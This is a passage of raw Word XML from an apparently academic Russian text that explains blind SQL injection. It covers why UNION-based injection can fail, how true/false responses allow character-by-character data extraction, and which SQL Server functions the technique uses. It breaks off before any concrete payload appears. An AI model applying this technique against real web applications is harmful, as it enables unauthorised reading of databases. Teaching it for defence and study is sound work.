      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc420429532"/>
      <w:bookmarkStart w:id="7" w:name="_Toc420854436"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Алгоритм внедрения sql-кода </w:t>
      </w:r>
      <w:r w:rsidR="002C4CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с помощью</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> слепой инъекции</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00671BB3" w:rsidRPr="00671BB3" w:rsidRDefault="00671BB3" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00034EEB" w:rsidRPr="00B97D9A" w:rsidRDefault="008E2C84" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Инъекция с помощью оператора </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2C84">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> не всегда срабатывает.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На сервере может стоять проверка типа и количества данных, полученны</w:t>
      </w:r>
      <w:r w:rsidR="00135789">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">х </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в результате запроса. В таком случае произойдёт перенаправление на страницу с ошибкой либо результаты инъекции и вовсе не будут показаны.</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Поэтому злоумышленник </w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мож</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ет</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> использовать технику </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или слепой sql-инъекции</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3" w:rsidRPr="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00671BB3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00034EEB" w:rsidRPr="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Слепая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00034EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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появляется, когда уязвимый запрос является некоторой логикой работы приложения, но не позволяет вывести какие-либо данные в возвращаемую Web-приложением страницу.</w:t>
      </w:r>
      <w:r w:rsidR="00034EEB" w:rsidRPr="00742A82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00034EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Такая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-инъекция по своим возможностям сопоставима с классической техникой внедрения операторов SQL. Аналогично классической технике эксплуат</w:t>
      </w:r>
      <w:r w:rsidR="00034EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ации подобных уязвимостей, слепая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 xml:space="preserve"> -</w:t>
      </w:r>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позволяет записывать и читать файлы, получать данные из таблицы, но только чтение в данном случае осуществляется посимвольно. Стандартная техника эксплуатации подобных уязвимостей основывается на использовании логических выражений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00034EEB" w:rsidRPr="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00034EEB" w:rsidRPr="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00034EEB" w:rsidRPr="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00034EEB" w:rsidRPr="00742A82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Если выражение истинно, то Web-приложение вернет одно содержимое, а если выражение является ложным, то другое. Полагаясь на различия вывода при истинных и ложных конструкциях в запросе, становится возможным осуществлять посимвольный перебор данных в таблице или в файле.</w:t>
      </w:r>
      <w:r w:rsidR="00034EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRPr="002C71B6" w:rsidRDefault="002C71B6" w:rsidP="008E2C84">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C71B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наиболее используемые функции в слепой инъекции:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97D9A" w:rsidRPr="00B97D9A" w:rsidRDefault="00187B14" w:rsidP="00B97D9A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>expression</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -возвращает количество символов указанного строкового выражения, исключая конечные пробелы. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>string_expression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - оцениваемое строковое </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>выражение</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Аргумент </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>string_expression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="00B97D9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> может быть константой, переменной или столбцом любых символьных или двоичных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B97D9A" w:rsidRPr="00B97D9A" w:rsidRDefault="00B97D9A" w:rsidP="00B97D9A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRPr="003654EA" w:rsidRDefault="00187B14" w:rsidP="00E62392">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SUBSTRING</w:t>
      </w:r>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</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 Возвращает часть символьного, двоичного, текстового или графического выражения в SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Server</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 Выражение типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>character</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binary</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text</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ntext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>image</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  целое число или выражение типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bigint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, указывающее начальную позицию возвращаемых символов. Если аргумент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имеет значение меньше 1, то возвращаемое выражение начинается с первого символа, который указан в аргументе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В этом случае количество возвращаемых символов равно сумме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 1 либо равно 0, в зависимости от того, какое из значений больше. Если значение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больше количества символов в выражении значения, возвращается выражение нулевой длины.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  положительное целое число или выражение типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bigint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E62392" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, указывающее количество символов выражения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которое будет возвращено. Если значение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отрицательно, формируется ошибка и выполнение инструкции прерывается. Если сумма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и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больше количества символов в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то возвращается часть значения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с позиции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до конца.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRPr="003654EA" w:rsidRDefault="00187B14" w:rsidP="00B97D9A">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LOWER</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E58DC" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>character_expression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - возвращает символьное выражение после преобразования символьных данных верхнего регистра в символьные данные нижнего регистра.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 выражение символьных или двоичных данных.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может быть константой, переменной или столбцом. Аргумент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должен иметь тип данных, который может быть неявно </w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">преобразован в тип данных </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>varchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В противном случае </w:t>
      </w:r>
      <w:r w:rsidR="004E6BC2" w:rsidRPr="004E6BC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>необходимо использовать</w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> функцию CAST для явного преобразования типа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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRPr="003654EA" w:rsidRDefault="00187B14" w:rsidP="00B97D9A">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ASCII</w:t>
      </w:r>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>character_expression</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C71B6" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- возвращает код ASCII первого символа указанного символьного выражения.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 выражение типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>varchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B97D9A" w:rsidRPr="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRPr="003654EA" w:rsidRDefault="00187B14" w:rsidP="002C71B6">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 xml:space="preserve">DB_NAME() - возвращает имя базы данных. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C71B6" w:rsidRDefault="003C3BF9" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаблон определ</w:t>
      </w:r>
      <w:r w:rsidR="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ения длины имени какого-либо объ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>екта базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3BF9" w:rsidRPr="00ED40D4" w:rsidRDefault="003C3BF9" w:rsidP="008E2C84">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED40D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
